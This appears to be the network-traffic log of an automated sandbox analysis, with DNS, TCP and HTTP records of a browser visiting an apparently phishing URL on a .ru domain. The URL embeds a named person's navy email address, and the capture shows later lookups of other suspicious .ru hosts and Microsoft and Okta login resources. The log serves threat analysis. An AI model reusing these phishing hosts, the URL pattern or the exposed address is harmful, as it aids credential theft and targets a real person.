                                                                  Mar 14, 2025 12:31:14.833195925 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:14.836173058 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:14.836189032 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.297307968 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:15.297357082 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:15.297418118 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:15.297760010 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:15.297770977 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:15.310094118 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.310564995 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:15.310601950 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.310801029 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:15.310813904 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.310873985 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:15.310880899 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.691040993 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.691167116 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.691206932 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:15.692047119 CET49773443192.168.2.4104.21.43.175
                                                                  Mar 14, 2025 12:31:15.692066908 CET44349773104.21.43.175192.168.2.4
                                                                  Mar 14, 2025 12:31:15.780982971 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:15.781299114 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:15.781317949 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:15.781495094 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:15.781501055 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:18.069545984 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:18.069644928 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:18.069844961 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:18.070611000 CET49774443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:18.070631027 CET44349774104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:36.543930054 CET49779443192.168.2.4142.250.186.68
                                                                  Mar 14, 2025 12:31:36.543986082 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:36.544053078 CET49779443192.168.2.4142.250.186.68
                                                                  Mar 14, 2025 12:31:36.544220924 CET49779443192.168.2.4142.250.186.68
                                                                  Mar 14, 2025 12:31:36.544238091 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:37.202588081 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:37.203104973 CET49779443192.168.2.4142.250.186.68
                                                                  Mar 14, 2025 12:31:37.203119993 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:39.593796015 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:39.593847990 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:39.593944073 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:39.594140053 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:39.594152927 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:40.070281029 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:40.070677996 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:40.070714951 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:40.070862055 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:40.070868015 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:41.182476997 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:41.182580948 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:41.182655096 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:41.184643030 CET49781443192.168.2.4104.21.0.223
                                                                  Mar 14, 2025 12:31:41.184678078 CET44349781104.21.0.223192.168.2.4
                                                                  Mar 14, 2025 12:31:43.683212042 CET49739443192.168.2.4151.101.66.137
                                                                  Mar 14, 2025 12:31:43.683242083 CET44349739151.101.66.137192.168.2.4
                                                                  Mar 14, 2025 12:31:46.589077950 CET4973080192.168.2.4142.250.186.67
                                                                  Mar 14, 2025 12:31:46.594228983 CET8049730142.250.186.67192.168.2.4
                                                                  Mar 14, 2025 12:31:46.594307899 CET4973080192.168.2.4142.250.186.67
                                                                  Mar 14, 2025 12:31:47.104381084 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:47.104460001 CET44349779142.250.186.68192.168.2.4
                                                                  Mar 14, 2025 12:31:47.104604006 CET49779443192.168.2.4142.250.186.68
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Mar 14, 2025 12:30:32.305636883 CET53581231.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:32.370071888 CET53528491.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:33.306792974 CET53540851.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:33.460632086 CET53594631.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:36.480380058 CET5706053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:36.480493069 CET5611653192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:36.488605976 CET53570601.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:36.489170074 CET53561161.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:37.568679094 CET5579053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:37.568810940 CET5634153192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:37.577636957 CET53563411.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:37.578514099 CET53557901.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:37.582875013 CET4941753192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:37.594504118 CET53494171.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.931822062 CET5583253192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.931998968 CET5600153192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.933485031 CET5450653192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.933952093 CET5797753192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.934662104 CET6426853192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.934997082 CET6439053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:38.938524008 CET53560011.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.938694954 CET53558321.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.939879894 CET53545061.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.940741062 CET53579771.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.941847086 CET53642681.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:38.942507982 CET53643901.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:40.320329905 CET5800553192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:40.320329905 CET5299953192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:40.327666998 CET53529991.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:40.329663038 CET53580051.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:50.425564051 CET53629281.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:54.331742048 CET5812553192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:54.331892967 CET5343153192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:54.387173891 CET53581251.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:54.419483900 CET53534311.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:58.606494904 CET6149853192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:58.606640100 CET5432953192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:58.613166094 CET53614981.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:58.613209009 CET53543291.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:59.373457909 CET6419053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:59.373672962 CET5167353192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:59.376420975 CET5390453192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:59.376554012 CET5278753192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:30:59.379933119 CET53641901.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:59.380645990 CET53516731.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:59.396244049 CET53527871.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:30:59.420030117 CET53539041.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:00.276262999 CET5765453192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:00.276480913 CET6212353192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:00.283159018 CET53621231.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:00.283206940 CET53576541.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:04.792085886 CET53635511.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:04.954138994 CET5845553192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:04.954265118 CET6462053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:04.961038113 CET53584551.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:04.962599039 CET53646201.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:05.576143026 CET5040553192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:05.576423883 CET5588753192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:05.626548052 CET53504051.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:05.652407885 CET53558871.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:07.107439995 CET6025053192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:07.107678890 CET5541553192.168.2.41.1.1.1
                                                                  Mar 14, 2025 12:31:07.116235971 CET53602501.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:07.116252899 CET53554151.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:09.437633038 CET53580741.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:31.679269075 CET53534831.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:32.509713888 CET53598691.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:34.588771105 CET53574861.1.1.1192.168.2.4
                                                                  Mar 14, 2025 12:31:39.332544088 CET138138192.168.2.4192.168.2.255
                                                                  Mar 14, 2025 12:31:41.192886114 CET53586271.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                  Mar 14, 2025 12:30:54.419543028 CET192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                                  Mar 14, 2025 12:31:05.653559923 CET192.168.2.41.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Mar 14, 2025 12:30:36.480380058 CET192.168.2.41.1.1.10xafbcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:36.480493069 CET192.168.2.41.1.1.10xc4f4Standard query (0)www.google.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.568679094 CET192.168.2.41.1.1.10x7798Standard query (0)encryption-marinha.jkndfuzv.ruA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.568810940 CET192.168.2.41.1.1.10xcd76Standard query (0)encryption-marinha.jkndfuzv.ru65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.582875013 CET192.168.2.41.1.1.10x7281Standard query (0)encryption-marinha.jkndfuzv.ruA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.931822062 CET192.168.2.41.1.1.10x4162Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.931998968 CET192.168.2.41.1.1.10x8407Standard query (0)code.jquery.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.933485031 CET192.168.2.41.1.1.10x5c31Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.933952093 CET192.168.2.41.1.1.10xa615Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.934662104 CET192.168.2.41.1.1.10x6778Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.934997082 CET192.168.2.41.1.1.10xb96fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.320329905 CET192.168.2.41.1.1.10x26eeStandard query (0)developers.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.320329905 CET192.168.2.41.1.1.10x1a60Standard query (0)developers.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:54.331742048 CET192.168.2.41.1.1.10x5961Standard query (0)jygdt.tjezyf.ruA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:54.331892967 CET192.168.2.41.1.1.10x6b9cStandard query (0)jygdt.tjezyf.ru65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:58.606494904 CET192.168.2.41.1.1.10x6e15Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:58.606640100 CET192.168.2.41.1.1.10xcac2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.373457909 CET192.168.2.41.1.1.10x1a2cStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.373672962 CET192.168.2.41.1.1.10x1839Standard query (0)github.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.376420975 CET192.168.2.41.1.1.10x2252Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.376554012 CET192.168.2.41.1.1.10xf3eStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.276262999 CET192.168.2.41.1.1.10xd43aStandard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.276480913 CET192.168.2.41.1.1.10x1274Standard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.954138994 CET192.168.2.41.1.1.10x8f58Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.954265118 CET192.168.2.41.1.1.10x8552Standard query (0)get.geojs.io65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:05.576143026 CET192.168.2.41.1.1.10xabf3Standard query (0)yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ruA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:05.576423883 CET192.168.2.41.1.1.10xf746Standard query (0)yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.107439995 CET192.168.2.41.1.1.10xb139Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.107678890 CET192.168.2.41.1.1.10x3cfcStandard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 14, 2025 12:30:36.488605976 CET1.1.1.1192.168.2.40xafbcNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:36.489170074 CET1.1.1.1192.168.2.40xc4f4No error (0)www.google.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.577636957 CET1.1.1.1192.168.2.40xcd76Name error (3)encryption-marinha.jkndfuzv.runonenone65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.578514099 CET1.1.1.1192.168.2.40x7798Name error (3)encryption-marinha.jkndfuzv.runonenoneA (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.594504118 CET1.1.1.1192.168.2.40x7281No error (0)encryption-marinha.jkndfuzv.ru104.21.43.175A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:37.594504118 CET1.1.1.1192.168.2.40x7281No error (0)encryption-marinha.jkndfuzv.ru172.67.182.163A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.938694954 CET1.1.1.1192.168.2.40x4162No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.938694954 CET1.1.1.1192.168.2.40x4162No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.938694954 CET1.1.1.1192.168.2.40x4162No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.938694954 CET1.1.1.1192.168.2.40x4162No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.939879894 CET1.1.1.1192.168.2.40x5c31No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.939879894 CET1.1.1.1192.168.2.40x5c31No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.940741062 CET1.1.1.1192.168.2.40xa615No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.941847086 CET1.1.1.1192.168.2.40x6778No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.941847086 CET1.1.1.1192.168.2.40x6778No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:38.942507982 CET1.1.1.1192.168.2.40xb96fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.327666998 CET1.1.1.1192.168.2.40x1a60No error (0)developers.cloudflare.com104.16.2.189A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.327666998 CET1.1.1.1192.168.2.40x1a60No error (0)developers.cloudflare.com104.16.5.189A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.327666998 CET1.1.1.1192.168.2.40x1a60No error (0)developers.cloudflare.com104.16.6.189A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.327666998 CET1.1.1.1192.168.2.40x1a60No error (0)developers.cloudflare.com104.16.4.189A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.327666998 CET1.1.1.1192.168.2.40x1a60No error (0)developers.cloudflare.com104.16.3.189A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:40.329663038 CET1.1.1.1192.168.2.40x26eeNo error (0)developers.cloudflare.com65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:54.387173891 CET1.1.1.1192.168.2.40x5961No error (0)jygdt.tjezyf.ru172.67.153.160A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:54.387173891 CET1.1.1.1192.168.2.40x5961No error (0)jygdt.tjezyf.ru104.21.3.223A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:54.419483900 CET1.1.1.1192.168.2.40x6b9cNo error (0)jygdt.tjezyf.ru65IN (0x0001)false
                                                                  Mar 14, 2025 12:30:58.613166094 CET1.1.1.1192.168.2.40x6e15No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.379933119 CET1.1.1.1192.168.2.40x1a2cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.396244049 CET1.1.1.1192.168.2.40xf3eNo error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.420030117 CET1.1.1.1192.168.2.40x2252No error (0)ok4static.oktacdn.comd19d360lklgih4.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.420030117 CET1.1.1.1192.168.2.40x2252No error (0)d19d360lklgih4.cloudfront.net13.33.187.14A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.420030117 CET1.1.1.1192.168.2.40x2252No error (0)d19d360lklgih4.cloudfront.net13.33.187.68A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.420030117 CET1.1.1.1192.168.2.40x2252No error (0)d19d360lklgih4.cloudfront.net13.33.187.96A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:30:59.420030117 CET1.1.1.1192.168.2.40x2252No error (0)d19d360lklgih4.cloudfront.net13.33.187.120A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.283206940 CET1.1.1.1192.168.2.40xd43aNo error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.283206940 CET1.1.1.1192.168.2.40xd43aNo error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.283206940 CET1.1.1.1192.168.2.40xd43aNo error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:00.283206940 CET1.1.1.1192.168.2.40xd43aNo error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.961038113 CET1.1.1.1192.168.2.40x8f58No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.961038113 CET1.1.1.1192.168.2.40x8f58No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.961038113 CET1.1.1.1192.168.2.40x8f58No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:04.962599039 CET1.1.1.1192.168.2.40x8552No error (0)get.geojs.io65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:05.626548052 CET1.1.1.1192.168.2.40xabf3No error (0)yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru104.21.0.223A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:05.626548052 CET1.1.1.1192.168.2.40xabf3No error (0)yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru172.67.128.87A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:05.652407885 CET1.1.1.1192.168.2.40xf746No error (0)yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru65IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116235971 CET1.1.1.1192.168.2.40xb139No error (0)aadcdn.msauthimages.netwww.tm.aadmsodsxstore01prod.msauthimages.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116235971 CET1.1.1.1192.168.2.40xb139No error (0)www.tm.aadmsodsxstore01prod.msauthimages.trafficmanager.netaadmsodsxstore01prod.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116235971 CET1.1.1.1192.168.2.40xb139No error (0)aadmsodsxstore01prod.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116235971 CET1.1.1.1192.168.2.40xb139No error (0)e329293.dscd.akamaiedge.net2.22.242.18A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116235971 CET1.1.1.1192.168.2.40xb139No error (0)e329293.dscd.akamaiedge.net2.22.242.148A (IP address)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116252899 CET1.1.1.1192.168.2.40x3cfcNo error (0)aadcdn.msauthimages.netwww.tm.aadmsodsxstore01prod.msauthimages.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116252899 CET1.1.1.1192.168.2.40x3cfcNo error (0)www.tm.aadmsodsxstore01prod.msauthimages.trafficmanager.netaadmsodsxstore01prod.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Mar 14, 2025 12:31:07.116252899 CET1.1.1.1192.168.2.40x3cfcNo error (0)aadmsodsxstore01prod.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                  • encryption-marinha.jkndfuzv.ru
                                                                    • cdnjs.cloudflare.com
                                                                    • challenges.cloudflare.com
                                                                    • code.jquery.com
                                                                    • developers.cloudflare.com
                                                                    • jygdt.tjezyf.ru
                                                                    • github.com
                                                                    • ok4static.oktacdn.com
                                                                    • objects.githubusercontent.com
                                                                    • get.geojs.io
                                                                    • yut0iokyzukehjk5kncud7ry0v0fok7c8jwt70p18hbzykwgi9o.uraleconomic.ru
                                                                    • aadcdn.msauthimages.net
                                                                  • www.google.com
                                                                  • a.nel.cloudflare.com
                                                                  • c.pki.goog
                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.449730142.250.186.6780
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 14, 2025 12:30:45.232209921 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                                  Cache-Control: max-age = 3000
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                                  Host: c.pki.goog
                                                                  Mar 14, 2025 12:30:45.845241070 CET222INHTTP/1.1 304 Not Modified
                                                                  Date: Fri, 14 Mar 2025 11:19:49 GMT
                                                                  Expires: Fri, 14 Mar 2025 12:09:49 GMT
                                                                  Age: 656
                                                                  Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                  Cache-Control: public, max-age=3000
                                                                  Vary: Accept-Encoding
                                                                  Mar 14, 2025 12:30:45.849819899 CET200OUTGET /r/r4.crl HTTP/1.1
                                                                  Cache-Control: max-age = 3000
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                                  Host: c.pki.goog
                                                                  Mar 14, 2025 12:30:46.028036118 CET223INHTTP/1.1 304 Not Modified
                                                                  Date: Fri, 14 Mar 2025 11:03:42 GMT
                                                                  Expires: Fri, 14 Mar 2025 11:53:42 GMT
                                                                  Age: 1623
                                                                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                  Cache-Control: public, max-age=3000
                                                                  Vary: Accept-Encoding


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449720104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:38 UTC714OUTGET /PtM2i/$nadia.sofia.rijo@marinha.pt HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-03-14 11:30:38 UTC1212INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
